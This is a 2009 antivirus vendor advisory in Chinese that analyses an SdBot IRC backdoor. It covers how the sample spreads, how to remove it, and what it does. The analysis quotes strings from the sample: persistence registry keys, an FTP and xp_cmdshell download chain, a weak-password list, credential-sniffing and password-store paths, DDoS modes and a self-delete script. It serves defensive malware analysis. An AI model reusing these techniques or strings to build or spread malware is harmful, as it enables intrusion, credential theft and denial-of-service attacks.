捕获时间
2009-1-28
病毒摘要
该样本是使用Microsoft Visual C 6.0编写的后门程序,由微点主动防御软件自动捕获,加WinUnPack壳后长度为53,528 字节,图标为“ ”,病毒扩展名为exe,主要通过“网页木马”、“文件捆绑”的方式传播,病毒主要作为被入侵系统的后门使用。
感染对象
Windows 2000/Windows XP/Windows 2003
传播途径
网页木马,文件捆绑,系统和软件漏洞,系统共享
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 微点主动防御软件自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Backdoor.Win32.SdBot.aad.d”,请直接选择删除(如图2)。
图2 微点主动防御软件升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,动态获取所需的API,并调试环境检测,一旦检测到调试自杀后退出,没检测到继续,经过解密字符串后,检查自身是否已经运行,如果已经运行,则退出,否则拷贝自身到%SystemRoot%目录,然后设置文件时间与explorer.exe相同,并设置文件属性为系统加隐藏加只读,并设置派发服务函数,修改注册表与安装服务,成功后退出。
具体行为分析:
1.反调试手段:
(1) 利用"IsDebuggerPresent"检测调试器
(2) 利用GetTickout检查时间差检测是否被调试
(3) 通过检查注册表检测是否在虚拟机里运行:
ASCII "SOFTWARE\VMware, Inc.\VMware Tools"
(4) 通过检查设备对象\\.\NTICE检测SoftICE
2. 是否已经运行检测:
通过检测自身路径判断是否第一次运行:
如果在%SystemRoot%,表示已经运行,直接退出,否则拷贝自身到此目录,名称为“msdvd.exe”。
3. 注册表操作:
注册表操作函数通过判断最后一个参数的值有不同的操作:
最后一个参数为1时,添加键值:
| |
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions"
Value = “C:\Documents and Settings\Administrator\桌面\ msdvd.exe” |
|
4.创建服务:
| |
ServiceName = "MicrosoftDVD"
DisplayName = "microsoftdvdhelp"
|StartType = SERVICE_AUTO_START
|BinaryPathName = """C:\WINDOWS\msdvd.exe""" |
|
5.派发服务函数主要功能:
是负责开线程,主要功能在线程函数里实现,功能如下:
(1) 设置%SystemRoot%\msdvd.exe 属性为正常,然后删除文件,连续删除3次
(2) 开启一个线程监控注册表,每600ms检测一次,发现被修改就改回来
| |
SubKey = SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Key = Shell |
|
(3) 新开启一个线程枚举网络共享
| |
'd$\windows\system32',0 ;
'd$\winnt\system32',0 ;
'Admin$\system32',0 ;
'Admin$',0 |
|
(4) 释放名为rdriv.sys的驱动,并创建服务加载驱动,驱动用于保护病毒进程不被结束
(5) 通过设置注册表删除服务
| |
Subkey = SYSTEM\\CurrentControlSet\\Control\
ValueName = WaitToKillServiceTimeout
Value = 7000 |
|
(6) 开端口等待病毒作者连接,这个后门除了支持一般的文件,注册表操作外,还提供了IRC后门功能,支持代理跳板扫描,各种DDOS,更新服务端等很多自定义命令。
(7) 扫描局域网,利用lsass, FTPD, MsSqlServer的各种已知漏洞溢出局域网其他主机,溢出成功后,上传自身并安装后门,还尝试暴力破解Sql server的密码
| |
echo quit >> o &ftp -n -s:o &del /F /Q o &%s
EXEC master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us
User is running mIRC %s, connected to %s (%s:%s) using the nic
' Admin ',0 ;
' Root ',0 ;
' Server',0 ;
' Asdf',0 ;
'administrator',0
'!@#$%^&',0 ;
'!@#$%^',0 ;
'!@#$%',0 ;
'!@#$',0 ;
'654321',0 ;
'123456',0 ;
'12345',0 ;
'1234',0 ;
'123',0 ;
'12',0 ;
'111',0 ;
'1',0 ; |
|
(8) 带有sniffer功能:嗅探各种密码
| |
FTP sniff "%s:%d" to "%s:%d": - "%s"',0Ah,0
'IRC sniff "%s:%d" to "%s:%d": - "%s"',0
'Bot sniff "%s:%d" to "%s:%d": - "%s"
POP3 Password2',0
'POP3 Server',0
'POP3 User Name',0
'HTTPMail Password2',0
'Hotmail',0 |
|
(9) 从注册表读区浏览器保存的密码:
| |
Software\Microsoft\Internet Account Manager\Accounts
IE Auto-Complete:
IE Password Protected: |
|
(10) 带有Ddos功能:
| |
'ackflood',0
'icmpflood',0
'phatwonk',0
'synflood',0
'udpflood' |
|
(11) 自删除:
| |
'@echo off',0Dh,0Ah ;
':Repeat',0Dh,0Ah
'del "%s">nul',0Dh,0Ah
'if exist "%s" goto Repeat',0Dh,0Ah
'del "%%0"' |
|
|
